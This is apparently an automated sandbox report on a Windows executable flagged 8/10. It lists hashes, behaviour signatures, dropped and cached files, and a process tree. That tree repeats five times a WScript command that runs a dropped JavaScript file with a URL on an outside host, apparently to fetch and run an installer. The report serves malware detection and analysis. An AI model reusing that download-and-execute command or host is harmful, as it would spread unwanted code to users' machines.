Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    07/05/2024, 01:49

General

  • Target

    1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    1f08dba1c294a753b71f99ad678916c5

  • SHA1

    feb848a9f2d0259274d4b585def9437ac5972313

  • SHA256

    9054054d38316e7d0026a71bbb55fdf023d2616deed4997b32900178b056f4f6

  • SHA512

    ba6044796e764f1298978b08269616152ca6d1051a463e31fe51eaba47544a0c841786c930d149c6b06dfed1a9c80c45cf6e74a8f2ca85fbbe7dcad2745d3d42

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3C:/7BSH8zUB+nGESaaRvoB7FJNndnb

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2192
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf163F.js" http://www.djapp.info/?domain=pqzuVvGjFp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf163F.exe
      2⤵
      • Blocklisted process makes network request
      PID:1956
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf163F.js" http://www.djapp.info/?domain=pqzuVvGjFp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf163F.exe
      2⤵
      • Blocklisted process makes network request
      PID:2424
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf163F.js" http://www.djapp.info/?domain=pqzuVvGjFp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf163F.exe
      2⤵
      • Blocklisted process makes network request
      PID:2792
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf163F.js" http://www.djapp.info/?domain=pqzuVvGjFp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf163F.exe
      2⤵
      • Blocklisted process makes network request
      PID:2588
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf163F.js" http://www.djapp.info/?domain=pqzuVvGjFp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf163F.exe
      2⤵
      • Blocklisted process makes network request
      PID:2264

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    c89a9213a9715073115bb20adc2ea72e

    SHA1

    77cda38819260e781b37b99152d9512cbb898148

    SHA256

    1b8ed0a156249541319deee72d844a5017a179ff7b29923452e61d60b453d3a3

    SHA512

    86da9ebcf2f19e25d33d4700ed7b0fb713b8367449be8e0b0ed4b1f5eb8019f11d4952c4b750cb90cc5730d49cedb2034d5ea91c24d46fd3516ccd36a4212fd2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    a5721074b68463ce487a7978e4693d67

    SHA1

    b32e1b7a6d5b06c4e59856454cfa2007b2be23cc

    SHA256

    72efdb9acbd4b5fc2663e06479924644bde3b26f516bd0ad626d9e9189218530

    SHA512

    8deb3026db8963cd595a04b7d561617ae8d28d33c204a97ed15bf60ea1449b62d987ad9138dae1895a98c2c8d66070aeeeb6cf84abc6aaf04ce2fb785ee530e3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    82e65debe4f840a3012fd634eb27fe54

    SHA1

    5d97b4645285d7a454e36d5b4a1e020f0820907c

    SHA256

    8f8584d9b69cb9e1d193903d888da081445f868867659e50f889eccbe7b9c2e7

    SHA512

    e7d7d33e281922e459d57aed15a0f5a4e5f3d586fdefc0e7f984651798d441081296d75183bd7dbc01c3686fb1ddd63bfbc4f456d1e9634eb03e9f80435878c7

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    392B

    MD5

    23ee6303a16e6884e8b6f7f2e53a912d

    SHA1

    8f828f58b2ddcd2c93cf3a9e3c1a5098e5d20d71

    SHA256

    6a5e61ba0ed586597a0b868b8cc16e631c055047ba684e599a2c0780da3ea368

    SHA512

    6b7fe2d6fbaed233fd6565856f31a78764472c0d2b77c38e830efa1fcd46fe11eea1ac315bd9fcf4de1f01a865c77f59af39fc6341843a1331d2a6443f1aa558

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm

    Filesize

    6KB

    MD5

    d15d5d41efc8c4dfa36fdb8eb09e7d68

    SHA1

    1708718d197935643816e79898a1d556d37e23f8

    SHA256

    b77307eb0431b1d9e826dd8e6e0ae2daca31cf5e479d0b4cbfea36a1ec993fdf

    SHA512

    30e91b9cfe423211bd175226893778430437a846e0c979d5bb84c4373123d1bdf2aa1ec2d87d37150da629563a577c2ecfdb135de60f8be8f6740451d080bbcf

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm

    Filesize

    40KB

    MD5

    59e12a065a6f7b5482e908d2ccdc5bd2

    SHA1

    f433d8b8d9e4e6c486c6bd69f2b90f4770e0fc96

    SHA256

    9ec8ccaf2ccb909e1f6198fd792ff35661b6e08695f6f1b9fb5fe8ecc9da837f

    SHA512

    c8fd9a0e13a228955e4c5a832f8080f0fbbcbc34c91020eda7cb6e5b74a6526e62acf9c12777bf9aa14ac105d0736e99c23423292f2067ee31f70e0bea899af6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm

    Filesize

    40KB

    MD5

    7c548d4a3008181349d9d00454d67a50

    SHA1

    0468178689849288a21d1065be958982b1e6d98b

    SHA256

    f49f405214c43d9ceba430638e8f9345b488d043c3f01972aaa65a09829295b5

    SHA512

    53bb9fede2bb2e22ed71984c91687c81687d628b005b79e1201fe72f3ed9dab41b0f0e8dea64b674e92b56a22e6d36e3965c73c93fe4c178ca021cf6178cabcc

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm

    Filesize

    6KB

    MD5

    6f6c627b5ec224ff92e70c082c88d1e1

    SHA1

    d2f1fbb118efd3ce03f04dd4cdb55d68151efffd

    SHA256

    c3361bf97185e949a701a08ee3411e3d701602734b5415e239ce729c508427d1

    SHA512

    0227efaef1469f1a4371aa7acf96316bc32b5e7c88be833bc7cfb0b7017bc6d72dbd4eee03700c23b98a2aa1245fcae284e52daa1c37fd8c6fdb445429ae9476

  • C:\Users\Admin\AppData\Local\Temp\Cab45E6.tmp

    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\Tar5E37.tmp

    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • C:\Users\Admin\AppData\Local\Temp\fuf163F.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\O8A4AKQ2.txt

    Filesize

    177B

    MD5

    026eaa51c74f7422247ae5ba4cfe0524

    SHA1

    2ec212e45a95a9eb25e5738117d697ead502a10e

    SHA256

    1bd166fd97a0fcda4c785d5074a2ac3e61ab6aaeeb3d469b979524e1b792f607

    SHA512

    b323ad2f00699e25686306089e2dd8fcba2b72ef92d90d7e816b0b399386e37d15b43ba22fd4cd9d832c983156c178dac123416c271160e5f1180ec6d03843da